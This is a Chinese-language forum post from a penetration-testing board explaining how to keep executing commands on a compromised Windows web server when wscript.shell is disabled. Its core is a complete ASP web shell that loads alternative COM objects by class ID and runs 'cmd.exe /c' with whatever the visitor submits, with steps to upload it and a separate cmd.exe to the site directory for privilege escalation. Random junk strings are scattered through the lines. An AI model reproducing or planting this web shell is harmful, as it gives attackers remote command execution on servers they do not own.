找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 wscript.shell删除解决办法
返回列表 发新帖
查看: 2507|回复: 0
打印 上一主题 下一主题

wscript.shell删除解决办法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:36:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。. v! H% |: O# C1 ]' N3 r5 P
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。" t1 ~) A; ^! Z! x: z' @' C: |# k+ e
要想让运行命令可以试试这种方法,成功率为五五之数。
% h2 m1 }1 s* H- j; r- X& w8 Q! T把下面代码复制:
' T" d& f$ T0 X: r9 _: O4 E<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>5 Y) s& U+ O3 S! }! u) n. T* t
<%if err then%>3 Q2 C9 t  c9 Y: X
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>. V( ~$ Y  \; [* M3 W5 c
<%, i1 `( I* x2 ^2 p/ ]$ R5 z% s
end if
; `/ P4 B6 A) j# h/ aresponse.write("<textarea readonly cols=80 rows=20>")
: k+ ~7 D# h2 ?$ X6 q+ TOn Error Resume Next6 _& W0 E9 [5 H0 q+ ^
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall% N* d" w+ I; [1 ^& }9 ^% [
response.write("</textarea>"); a1 ?+ p7 |( g3 C1 h( w
response.write("<form method='post'>")
$ Z+ M- j4 Z7 q8 S7 `response.write("<input type=text name='c' size=60><br>")7 f3 g( @( R' M( N- ]: T. z# g. t
response.write("<input type=submit value='执行'></form>")0 E% ^. I% u6 B( i$ _' d2 y
%>& d8 H% `& N' r3 v& S: B: J
9 @2 r& Z# ^7 P" h6 c% z! _
保存为一个asp文件,然后传到网站目录上去- l1 X+ s2 b& c! u9 R. m
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
6 D9 S1 w* o; J. K2 m我用此成功运行过cacls命令。
! z% N' S5 J# v
2 ]5 E2 P3 g/ e! t第二那就是运行时出错,可能限制某些代码执行
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表